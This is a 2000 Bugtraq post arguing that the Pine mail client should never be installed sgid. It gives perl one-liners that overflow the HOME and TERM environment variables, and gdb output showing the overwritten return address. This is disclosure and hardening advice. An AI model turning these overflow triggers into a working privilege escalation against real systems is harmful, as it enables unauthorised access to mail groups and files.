[15445] in bugtraq
Why pine must never be sgid
daemon@ATHENA.MIT.EDU (Stan Bubrouski)
Fri Jun 23 16:32:16 2000
Message-Id: <20000623143313.18691.qmail@securityfocus.com>
Date: Fri, 23 Jun 2000 14:33:13 -0000
Reply-To: Stan Bubrouski <satan@FASTDIAL.NET>
From: Stan Bubrouski <satan@FASTDIAL.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Pine should never be sgid, yet I see it many times
installed sgid mail on many different UNIX and
Linux systems. Everybody admits pine should not be
sgid but yet I still it sgid on some distributions.
Why shouldn't it be sgid? A reminder using pine 4.21,
which is the latest version to my knowledge as an
example.
[root@king pine]# export HOME=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Segmentation fault (core dumped)
[root@king pine]# gdb pine core
...
Core was generated by `AAAAA'.
Program terminated with signal 11, Segmentation fault.
...
(gdb) where
#0 0x809e273 in strcpy () at ../sysdeps/generic/strcpy.c:30
#1 0x4eb6 in ?? ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb)
And another:
[root@king pine]# export TERM=`perl -e'print "A" x 10000;'`
[root@king pine]# pine
Can't open termcap file; check TERMCAP variable and/or
system manager.
Segmentation fault (core dumped)
There are countless more, I know everybody knows this
already, so why is pine still sgid on some systems?
-Stan Bubrouski
